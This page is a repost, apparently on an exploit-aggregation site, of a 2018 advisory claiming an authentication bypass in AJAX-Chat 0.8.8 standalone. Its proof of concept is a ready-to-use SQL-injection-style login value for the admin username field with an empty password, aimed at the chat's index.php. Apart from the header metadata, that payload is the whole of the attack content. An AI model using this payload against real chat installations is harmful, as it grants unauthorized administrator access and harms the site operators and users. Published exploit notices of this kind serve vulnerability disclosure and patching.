Advertisement



Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070115

Below is a copy:

AJAX-Chat-0.8.8-standalone - Authentication Bypass
|===============================================|
|                         In The Name Of GOD
|===============================================|
| Exploit Title: AJAX-Chat-0.8.8-standalone - Authentication Bypass
| Dork: N/A
| Date: 2018-07-10
| Exploit Author: Ashiyane Digital Security TEAM
| Vendor Homepage: https://frug.github.io/AJAX-Chat/
| Software Link : https://github.com/Frug/AJAX-Chat/archive/0.8.8-standalone.zip
| Version: v0.8.8
| Category: Web apps
| CVE: N/A
|===============================================|
| Description:
| With this exploit,attacker can bypass admin login authentication.
|
|===============================================|
|
| Proof of Concept :
|
| http://localhost/PATH/chat/index.php
| 
| Username : admin  or  'or' '='
| Password :  
|===============================================|

Copyright ©2018 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.